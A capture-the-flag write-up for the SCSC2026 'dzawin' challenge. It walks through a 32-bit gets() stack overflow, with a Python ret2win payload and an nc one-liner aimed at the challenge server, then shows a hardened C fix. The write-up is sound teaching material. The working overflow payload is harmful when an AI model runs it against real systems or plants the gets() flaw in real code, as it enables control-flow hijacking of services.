SCSC2026 Quals - dzawin - Binary Exploitation Writeup
Category: Binary Exploitation
Server: nc 43.128.69.211 13005
Flag: scsc26{r3t2wIn_f0r_fUn_4nD_pr0ViT}
Challenge Description
Classic buffer overflow with a win function.
Binary Analysis
$ file stack
stack: ELF 32-bit LSB executable, Intel 80386, dynamically linked, not stripped

$ checksec --file=stack
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

Key Functions
win() @ 0x080491c2

void win() {
    FILE *fp = fopen("flag.txt", "r");
    if (!fp) {
        perror("Error while opening the file.");
        exit(1);
    }
    int c;
    while ((c = fgetc(fp)) != EOF) {
        putchar(c);
    }
}

vuln() @ 0x0804921f

vuln:
    push ebp
    mov  ebp, esp
    sub  esp, 0x80          ; 128-byte buffer
    lea  eax, [ebp-0x80]    ; buffer address
    push eax
    call gets               ; VULNERABLE!
    leave
    ret

Stack Layout
[ 128 bytes buffer     ] <- ebp-0x80 (gets writes here)
[ 4 bytes saved EBP    ] <- ebp
[ 4 bytes return addr  ] <- ebp+4 (overwrite target)

Exploitation Strategy
- Fill 128-byte buffer with padding
- Overwrite 4-byte saved EBP with junk
- Overwrite return address with win() address (0x080491c2)
Total padding needed: 128 + 4 = 132 bytes
Exploit
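#!/usr/bin/env python3
import struct
import sys

padding = b'A' * 132                       # 128 buffer + 4 saved ebp
win_addr = struct.pack('<I', 0x080491c2)   # little-endian
payload = padding + win_addr

# Write raw bytes; print() on a bytes object would emit its b'...' repr instead.
sys.stdout.buffer.write(payload + b'\n')

One-liner:
python3 -c "import sys, struct; sys.stdout.buffer.write(b'A'*132 + struct.pack('<I', 0x080491c2) + b'\n')" | nc 43.128.69.211 13005

Output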
scsc26{r3t2wIn_f0r_fUn_4nD_pr0ViT}
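The overflow works because gets() has no length limit, so the fix is to bound the read to the 128-byte buffer. As an added example (not code from the challenge binary or this writeup; read_line_bounded and vuln_fixed are hypothetical names, and the input in main is constructed), here is a hardened counterpart of vuln() that rejects an overlong line instead of writing past the buffer:

```c
#define _POSIX_C_SOURCE 200809L /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128 /* same size as the buffer at ebp-0x80 in vuln() */

/* Hypothetical helper, not from the challenge binary: read one line into buf
 * without writing more than cap bytes. Returns the line length, or -1 on
 * EOF/error or when the line does not fit (the excess is drained). */
long read_line_bounded(FILE *in, char *buf, size_t cap)
{
    if (cap < 2 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0'; /* complete line: strip the newline */
        return (long)len;
    }
    int c = fgetc(in);
    if (c == '\n' || c == EOF)
        return (long)len; /* line filled the buffer exactly, or ended at EOF */
    while ((c = fgetc(in)) != '\n' && c != EOF)
        ; /* drain the rest so it is not parsed as the next line */
    buf[0] = '\0';
    return -1;
}

/* Hardened counterpart of vuln(): gets(buf) replaced by the bounded read. */
long vuln_fixed(FILE *in)
{
    char buf[BUF_SIZE];
    return read_line_bounded(in, buf, sizeof buf);
}

int main(void)
{
    /* Constructed input: 132 filler bytes plus 4 more, the length that
     * reaches the saved return address when read with gets(). */
    char line[138];
    memset(line, 'A', 136);
    memcpy(line + 136, "\n", 2);
    FILE *in = fmemopen(line, 137, "r");
    if (in == NULL)
        return 1;
    long n = vuln_fixed(in);
    printf("vuln_fixed returned %ld\n", n); /* overlong line is rejected */
    fclose(in);
    return n == -1 ? 0 : 1;
}
```

Rebuilding with a stack protector and as a position-independent executable would also address the "No canary found" and "No PIE" results from checksec, but the bounded read is what removes the bug itself.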
https://fuwari.vercel.app/posts/17/scsc2026-quals-dzawin-binary-exploitation-writeup/